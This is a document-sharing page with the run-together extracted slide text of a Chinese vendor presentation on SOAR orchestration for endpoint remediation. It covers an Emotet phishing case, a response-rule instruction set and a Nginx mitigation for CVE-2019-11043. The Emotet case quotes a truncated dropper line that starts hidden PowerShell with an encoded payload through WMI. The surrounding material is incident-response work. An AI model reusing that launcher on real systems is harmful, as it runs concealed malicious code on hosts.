SOAR如何编排指引细粒度的端点处置_第1页
SOAR如何编排指引细粒度的端点处置_第2页
SOAR如何编排指引细粒度的端点处置_第3页
SOAR如何编排指引细粒度的端点处置_第4页
SOAR如何编排指引细粒度的端点处置_第5页
已阅读5页,还剩47页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

SOAR如何编排指引细粒度的端点处置威胁框架:细粒度对抗威胁框架:细粒度对抗CONTENTS01面临的挑战02什么是SOAR03安天SOAR案例04安天SOAR架构05安天SOAR特点威胁框架:细粒度对抗威胁框架:细粒度对抗面临的挑战面临的挑战Page4威胁框架:细粒度对抗威胁框架:细粒度对抗威胁框架:细粒度对抗威胁框架:细粒度对抗什么是SOAR什么是SOAR(通过与其它技术的集成)并自动执行以达成预期结果,譬如分诊管理,事件响应,威胁情报,合规性管理和威胁猎捕。SOARaresolutionsthataddmachineassistancetohumansecurityoperatorsbytakinginputsfromtechnologies)andautomatedtoachieveadesiredoutcome,suchastriagemanagement,incidentresponders,threatintelligence,compliancemanagers,andthreathunting.来源:Page6威胁框架:细粒度对抗威胁框架:细粒度对抗Page7安天对SOAR的认知威胁框架:细粒度对抗威胁框架:细粒度对抗安天SOAR案例1324案例一内网Emotet传播事件:攻击过程还原1324应急响应人员排查后发现这是一起利用COVID-19为诱饵分发钓鱼邮件传播Emotet恶意代码的安全DoWhileGetObject(winmgmtS:win32_Procreate("Powershell-whidden-enJABBAHAGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaMAZgBwAHMAbQA9ACcAUgBeQB2AGUAJwA7ACQARQBrAHgAaABsAA来源《利用疫情传播Emotet银行木马攻击事件梳理Page9威胁框架:细粒度对抗威胁框架:细粒度对抗案例一内网Emotet传播事件:态势感知系统威胁告警Page10威胁框架:细粒度对抗威胁框架:细粒度对抗案例一内网Emotet传播事件:系统自动分析基于ATT&CK框架融合分析Page11威胁框架:细粒度对抗威胁框架:细粒度对抗案例一内网Emotet传播事件:处置流程的精细化编排Page12威胁框架:细粒度对抗威胁框架:细粒度对抗I案例一内网Emotet传播事件:处置流程的精细化编排Page13威胁框架:细粒度对抗威胁框架:细粒度对抗威胁框架:细粒度对抗Page14威胁框架:细粒度对抗案例一内网Emotet传播事件:处置脚本编辑器(4)、脚本(5)、其他(5+)等共25+种操作原语Page15安天ARR(AntiyResponseRule)开放式处置规则定义ARRARR(AntiyResponseRule)的部分指令集1.创建注册表项/值[Reg_Create] 2.修改注册表项/值[Reg_Modify] 3.删除注册表项/值[Reg_Delete] 4.重命名注册表项/值[Reg_Rename]5.删除注册表值[Reg_Delete_Value]1.创建计划任务[Task_Create]2.修改计划任务[Task_Modify]3.删除计划任务[Task_Delete]1.创建文件[File_Create]2.修改文件[File_Modify]3.删除文件[File_Delete]4.重命名文件[File_Rename]5.修改文件属性[File_Attribute]6.删除文件指定内容[File_DelText]7.MBR修复[File_repairMbr]1.创建进程[Proc_Create] 2.挂起/恢复进程[Proc_Modify] 3.结束进程[Proc_Terminate]4.挂起指定模块线程[Proc_Module_Threads]1.下发bat脚本并运行[Script_Bat]2.下发shell脚本并运行[Script_Shell]3.下发vbs脚本并运行[Script_Vbs]4.下发powershell脚本并运行[Script_PWL]5.下载文件并运行[Script_File]1.外设弹出/规则[Other_Device]2.断网处置[Other_NetOff]3.禁用端口[Other_Disabled_Port]3.禁用ip[Other_Disabled_Ip]4.补丁修复[Other_Fix_patch]5.创建互斥免疫[Other_Create_Mutex]6.创建扫描并自动处置[Other_QuickScan]二、计划任务(可配自动处置规则)一、注册表(可配自动处置规则)三、文件(可配自动处置规则)四、进程(可配自动处置规则)五、脚本六、其他安天ARR开放式处置规则定义是安天为实现细粒度端点响应策略而定义的一组指令集合,包括了对扇区、注册表、文件、驱动、进程等进行相关操作的动作定义,并可以执行包括磁盘遍历,特征匹配搜索等逻辑动作。可以用于处理策略编排、专杀脚本生成,以执行细粒度的处置动作。安天SOAR提供ARR编辑器,并可以在部分场景中自动生成处置脚本供网管审核。ARR处置规则支持判定条件,用于触发相应处置:案例一内网Emotet传播事件:生成处置包置包派发至相关设备,并将操作记录留存Page16威胁框架:细粒度对抗威胁框架:细粒度对抗案例二CVE-2019-11043漏洞告警Page17威胁框架:细粒度对抗威胁框架:细粒度对抗案例二CVE-2019-11043漏洞处置•根据资产所属业务属性选择缓解措施缓解脚本•修改Nginx配置文件增加SecRuleREQUEST_URI\•重载NginxPage18威胁框架:细粒度对抗威胁框架:细粒度对抗威胁框架:细粒度对抗威胁框架:细粒度对抗安天SOAR架构Page20SOAR功能架构终端探针流量探针网络设备安全设备资产运维其他系统威胁情报上下文识别实体关联事件归类分析工具案件报告流程处理关联分析剧本应用线索管理效能评估AVLPK专杀统数据平台场景剧本匹配剧本管理剧本验证剧本审核加密签名版本管理剧本库验证系统自动响应核对资源管理指令集管理控制台签名验证指令下发威胁情报上下文识别实体关联事件归类分析工具案件报告流程处理关联分析剧本应用线索管理效能评估AVLPK专杀统数据平台场景剧本匹配剧本管理剧本验证剧本审核加密签名版本管理剧本库验证系统自动响应核对资源管理指令集管理控制台签名验证指令下发指令编辑指令编辑可视化编排脚本编译Page21 威胁情报 态势感知 SOAR部署结构 威胁情报 态势感知 威胁框架:细粒度对抗威胁框架:细粒度对抗安天SOAR特点安全运营能力特点安天SOAR的能力安全运营能力特点安全能力编排化效能可评估效果可验证脚本编辑可视化关联分析流程化响应处置自动化Page24安天SOAR的价值统筹与协调智能化关联智能化分析威胁行为体活动的上下文信息关联汇总相似、相关事件统筹

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论